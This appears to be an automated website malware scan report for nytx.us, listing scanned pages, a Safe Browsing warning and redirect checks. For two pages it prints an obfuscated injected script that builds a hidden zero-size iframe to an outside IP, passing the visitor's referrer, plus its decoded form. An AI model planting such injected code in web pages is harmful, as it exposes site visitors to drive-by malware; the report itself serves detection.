Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nytx.us
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://nytx.us/ | 200 OK Content-Length: 13459 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 193.203.50.43 var x = 'h' + 't' + 't' + 'p' + ':' + '/' + '/' + '1' + '9' + '3' + '.' + '2' + '0' + '3' + '.' + '5' + '0' + '.' + '4' + '3'; var group = 'f' + 't' + 'p'; var charset = 'u' + 't' + 'f' + '-' + '8'; var rrr = encodeURIComponent(document.referrer); var url = x + '/?' + group + '&se_rrr=' + rrr + '&charset=' + charset; document.write('<' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + ' ' + 'w' + 'i' + 'd' + 't' + 'h' + '=' + '"' + '0' + '"' + ' ' + 'h' + 'e' + 'i' + 'g' + 'h' + 't' + '=' + '"' + '0' + '"' + ' ' + 'f' + 'r' + 'a' + 'm' + 'e' + 'b' + 'o' + 'r' + 'd' + 'e' + 'r' + '=' + '"' + '0' + '"' + ' ' + 's' + 'c' + 'r' + 'o' + 'l' + 'l' + 'i' + 'n' + 'g' + '=' + '"' + 'n' + 'o' + '"' + ' ' + 's' + 'r' + 'c' + '=' + '"' + url + '"' + '>' + '<' + '/' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + '>'); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe> | ||
http://nytx.us/scripts/museutils.js?441941709 | 200 OK Content-Length: 25574 Content-Type: application/javascript | clean |
http://nytx.us/scripts/webpro.js?197321703 | 200 OK Content-Length: 36609 Content-Type: application/javascript | clean |
http://nytx.us/scripts/musewpslideshow.js?4283859919 | 200 OK Content-Length: 12759 Content-Type: application/javascript | clean |
http://nytx.us/scripts/jquery.museoverlay.js?3836522771 | 200 OK Content-Length: 3123 Content-Type: application/javascript | clean |
http://nytx.us/scripts/touchswipe.js?4156838003 | 200 OK Content-Length: 4378 Content-Type: application/javascript | clean |
http://nytx.us/scripts/jquery.musemenu.js?3788803530 | 200 OK Content-Length: 5283 Content-Type: application/javascript | clean |
http://nytx.us/index.html | 200 OK Content-Length: 13459 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 193.203.50.43 var x = 'h' + 't' + 't' + 'p' + ':' + '/' + '/' + '1' + '9' + '3' + '.' + '2' + '0' + '3' + '.' + '5' + '0' + '.' + '4' + '3'; var group = 'f' + 't' + 'p'; var charset = 'u' + 't' + 'f' + '-' + '8'; var rrr = encodeURIComponent(document.referrer); var url = x + '/?' + group + '&se_rrr=' + rrr + '&charset=' + charset; document.write('<' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + ' ' + 'w' + 'i' + 'd' + 't' + 'h' + '=' + '"' + '0' + '"' + ' ' + 'h' + 'e' + 'i' + 'g' + 'h' + 't' + '=' + '"' + '0' + '"' + ' ' + 'f' + 'r' + 'a' + 'm' + 'e' + 'b' + 'o' + 'r' + 'd' + 'e' + 'r' + '=' + '"' + '0' + '"' + ' ' + 's' + 'c' + 'r' + 'o' + 'l' + 'l' + 'i' + 'n' + 'g' + '=' + '"' + 'n' + 'o' + '"' + ' ' + 's' + 'r' + 'c' + '=' + '"' + url + '"' + '>' + '<' + '/' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + '>'); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe> | ||
http://nytx.us/about.html | 200 OK Content-Length: 11219 Content-Type: text/html | clean |
http://nytx.us/brokerage.html | 200 OK Content-Length: 10703 Content-Type: text/html | clean |
http://nytx.us/call.html | 200 OK Content-Length: 11703 Content-Type: text/html | clean |
http://nytx.us/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nytx.us
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 09 Apr 2014 05:00:05 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 13459
Content-Type: text/html
Last-Modified: Fri, 06 Dec 2013 04:00:02 GMT
...13459 bytes of data.
GET / HTTP/1.1
Host: nytx.us
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 09 Apr 2014 05:00:05 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 13459
Content-Type: text/html
Last-Modified: Fri, 06 Dec 2013 04:00:02 GMT
...13459 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: nytx.us
Referer: http://www.google.com/search?q=nytx.us
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nytx.us
Referer: http://www.google.com/search?q=nytx.us
Result:
The result is similar to the first query. There are no suspicious redirects found.